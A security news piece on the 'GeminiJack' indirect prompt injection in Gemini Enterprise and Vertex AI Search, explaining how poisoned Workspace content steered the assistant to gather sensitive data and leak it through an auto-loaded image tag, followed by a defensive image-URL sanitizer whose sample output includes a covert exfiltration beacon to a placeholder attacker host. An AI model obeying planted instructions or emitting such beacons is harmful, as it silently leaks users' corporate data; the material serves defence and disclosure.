Google has fixed a critical zero-click vulnerability, named “GeminiJack,” affecting its Gemini Enterprise AI tools and Vertex AI Search, which could allow silent exfiltration of sensitive corporate data. The issue was discovered in June 2025 by Noma Security researchers and responsibly disclosed to Google. The vulnerability abused Retrieval-Augmented Generation (RAG) behavior, enabling attackers to inject malicious instructions into seemingly harmless content such as Google Docs, Gmail emails, or Calendar events shared within an organization.
The attack relied on content poisoning, where hidden prompts were embedded inside accessible Workspace files. These prompts instructed Gemini to search for sensitive terms like “budget” or “sales” across authorized data sources. When a user performed a normal AI query, Gemini retrieved the poisoned content, treated it as trusted input, and extracted relevant data from Gmail, Docs, and Calendar. The stolen information was then covertly embedded inside a malicious HTML image tag, which the browser automatically loaded, transmitting data to an attacker-controlled server without any user interaction or alerts. Since the AI itself executed the data retrieval and exfiltration, traditional DLP, endpoint, and perimeter security controls were unable to detect the activity.
Google acknowledged the vulnerability in August 2025 and implemented security fixes, including separating Vertex AI Search from Gemini Enterprise and strengthening trust boundaries within RAG workflows. A proof-of-concept was later published on December 8, 2025. Security experts warn that as AI agents gain broader access to enterprise data, risks from indirect prompt injection will continue to rise, highlighting the need for stricter permission models, AI-specific monitoring, and prompt validation mechanisms. This incident demonstrates the growing dual-use risk of enterprise AI and how a single flaw can significantly expand an organization’s attack surface.
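The exfiltration step described above works only if the rendering layer will load an image from any URL the model emits. One defensive control is to treat every image reference in model output as an egress request and allow only parameter-free HTTPS URLs on organization-controlled hosts. The following sanitizer is an added example, not code from Google, Noma Security or the Gemini product; the allowlisted host `images.example-corp.internal`, the sample model output and the `[image removed by policy]` placeholder are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts the organization controls and is willing to let a browser fetch from.
ALLOWED_IMAGE_HOSTS = {"images.example-corp.internal"}

# Image references that a browser or markdown renderer would auto-load.
HTML_IMG_RE = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.IGNORECASE)
MD_IMG_RE = re.compile(r'!\[[^\]]*\]\(([^)\s]+)[^)]*\)')


def classify_image_url(url):
    """Return ("allow" | "block", reason) for an image URL found in model output.

    Policy: HTTPS only, host must be allowlisted, and no query string or fragment,
    because those are the parts of a URL an attacker would use to carry data out.
    """
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return "block", f"scheme {parsed.scheme!r} is not https"
    if parsed.hostname not in ALLOWED_IMAGE_HOSTS:
        return "block", f"host {parsed.hostname!r} is not allowlisted"
    if parsed.query or parsed.fragment:
        return "block", "query string or fragment could carry exfiltrated data"
    return "allow", "allowlisted host, no parameters"


def sanitize_model_output(text):
    """Strip image references that fail the egress policy.

    Returns (clean_text, findings); each finding records the removed reference so
    it can be logged and alerted on as a possible injection attempt.
    """
    findings = []

    def _replace(kind):
        def _sub(match):
            url = match.group(1)
            verdict, reason = classify_image_url(url)
            if verdict == "allow":
                return match.group(0)
            findings.append({"kind": kind, "url": url, "reason": reason})
            return "[image removed by policy]"
        return _sub

    text = HTML_IMG_RE.sub(_replace("html_img"), text)
    text = MD_IMG_RE.sub(_replace("markdown_img"), text)
    return text, findings


# Constructed sample of model output: one covert HTML beacon carrying data in the
# query string, one legitimate internal chart, one internal image over plain HTTP.
SAMPLE_OUTPUT = (
    "Here is the Q3 summary you asked for.\n"
    '<img src="https://attacker.invalid/c.png?d=budget-2025-confidential" width="1" height="1">\n'
    "![chart](https://images.example-corp.internal/q3-chart.png)\n"
    "![logo](http://images.example-corp.internal/logo.png)\n"
)

if __name__ == "__main__":
    clean, findings = sanitize_model_output(SAMPLE_OUTPUT)
    print(clean)
    for f in findings:
        print(f"BLOCKED {f['kind']}: {f['url']} ({f['reason']})")
```

Run at the point where model output is handed to the renderer, before any HTML or markdown is turned into a network fetch; the `findings` list is the detection signal that the page notes conventional DLP and endpoint controls never see, and is worth routing to the SIEM with the user, session and retrieved-document identifiers attached.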
© 2021 CyberEnsō – Nihon Cyber Defence Co., Ltd. All Rights Reserved.